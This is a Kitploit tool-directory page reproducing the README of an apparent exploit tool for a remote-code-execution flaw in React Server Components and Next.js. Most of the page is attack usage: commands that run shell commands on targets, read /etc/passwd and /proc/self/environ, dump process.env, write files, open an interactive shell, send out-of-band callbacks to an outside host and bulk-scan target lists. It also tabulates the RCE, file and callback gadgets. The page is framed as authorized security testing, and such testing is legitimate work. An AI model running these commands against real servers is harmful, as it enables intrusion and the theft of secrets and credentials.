Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner — Exploit tool for CVE-2025-55182 and CVE-2025-66478 in React Server Components and Next.js, featuring RCE gadgets, file read/write, OOB callbacks, and interactive shell for authorized security testing. | Kitploit
Tools/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
Vulnerability ScannersDynamic Analysis (Sandboxing)ExploitationWeb Application ExploitationWeb SecurityPenetration TestingCommand and ControlLearning & EducationRed Teaming
Payload Development
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

Exploit tool for CVE-2025-55182 and CVE-2025-66478 in React Server Components and Next.js, featuring RCE gadgets, file read/write, OOB callbacks, and interactive shell for authorized security testing.

View Repository
21129 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182 - React Server Components RCE Exploit v2.0

A comprehensive security research tool for testing CVE-2025-55182 and CVE-2025-66478 vulnerabilities in React Server Components (RSC) and Next.js Server Actions.

Vulnerability Overview

PropertyValue
CVE IDsCVE-2025-55182, CVE-2025-66478
CVSS Score10.0 (CRITICAL)
Affected VersionsReact < 19.2.0, Next.js < 15.0.5
Vulnerability TypeRemote Code Execution (RCE)
Attack VectorNetwork

Features

  • PortSwigger-style vulnerability scanning with multiple detection payloads
  • Multiple RCE gadgets (execSync, spawnSync, vm.runInThisContext, etc.)
  • Out-of-Band (OOB) callback testing for blind RCE verification
  • File read/write capabilities
  • JavaScript code execution
  • Interactive shell mode
  • Bulk scanning with multi-threading
  • Proxy support (Burp Suite compatible)
  • JSON/Text output formats

Installation

Requirements

pip install requests

Python Version

  • Python 3.7 or higher

Quick Start

# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan

# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Interactive shell
python3 exploit-custom.py -u https://target.com --shell

Usage

Command Line Arguments

usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

Target Selection

ArgumentDescriptionExample
-u, --urlSingle target URL-u https://target.com
-l, --listFile containing URLs-l targets.txt

Scanning Modes

ArgumentDescription
--detectDetect Next.js/RSC usage
--checkQuick vulnerability check (math test)
--scanFull vulnerability scan (PortSwigger style)
--test-allTest all gadgets and detection payloads

Exploitation

ArgumentDescriptionExample
--cmdExecute shell command--cmd "id"
--gadgetSpecify gadget to use--gadget execSync
--readRead file from target--read /etc/passwd
--writeWrite file to target--write /tmp/test.txt "content"
--jsExecute JavaScript code--js "process.env"
--shellStart interactive shell--shell
--oobOOB callback host--oob xyz.oastify.com

Connection Options

ArgumentDescriptionExample
-p, --proxyHTTP/HTTPS proxy-p http://127.0.0.1:8080
-c, --cookiesCookie string-c "session=abc123"
-H, --headerExtra header (repeatable)-H "X-Custom: value"
-t, --threadsThread count for bulk scan-t 20
--timeoutRequest timeout in seconds--timeout 60

Output Options

ArgumentDescription
-o, --outputSave results to file (.json or .txt)
-q, --quietSuppress banner

Scanning Examples

Single Target

# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect

# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan

# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

Bulk Scanning

# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json

# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

Exploitation Examples

Command Execution

# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

File Operations

# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

JavaScript Execution

# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

Interactive Shell

python3 exploit-custom.py -u https://target.com --shell

Shell commands:

CommandDescription
<command>Execute shell command
!read <file>Read file
!write <file> <content>Write file
!js <code>Execute JavaScript
!gadget <name>Switch gadget
exitExit shell

Available Gadgets

RCE Gadgets

NameModule IDDescription
execSyncchild_process#execSyncDirect shell command execution
execFileSyncchild_process#execFileSyncExecute binary file
spawnSyncchild_process#spawnSyncSpawn process with arguments
vm_runInThisContextvm#runInThisContextExecute JS in current context
vm_runInNewContextvm#runInNewContextExecute JS with sandbox escape
vm_runInThisContext_globalvm#runInThisContextExecute via global.process

File Gadgets

NameModule IDDescription
fs_readFileSyncfs#readFileSyncRead arbitrary files
fs_writeFileSyncfs#writeFileSyncWrite arbitrary files

OOB Gadgets

NameDescription
vm_fetchHTTP request via fetch API (Node 18+)
vm_httpHTTP request via http module

Detection Payloads (CVE-2025-66478)

The --scan mode uses these PortSwigger-style detection payloads:

PayloadDescription
property_referenceColon-delimited property reference ["$1:a:a"]
property_reference_v2Alternative reference ["$1:b:b"]
property_reference_constructorConstructor access via property reference
property_reference_protoProto chain access via property reference
action_ref_vmACTION_REF with vm#runInThisContext
action_ref_execSyncACTION_REF with child_process#execSync

OOB Callback Methods

The tool supports multiple OOB callback methods:

MethodDescription
curlHTTP request via curl command
wgetHTTP request via wget command
nslookupDNS query
pingICMP ping
fetchNode.js fetch API
httpNode.js http module

Output Interpretation

Terminal Colors

Download Tool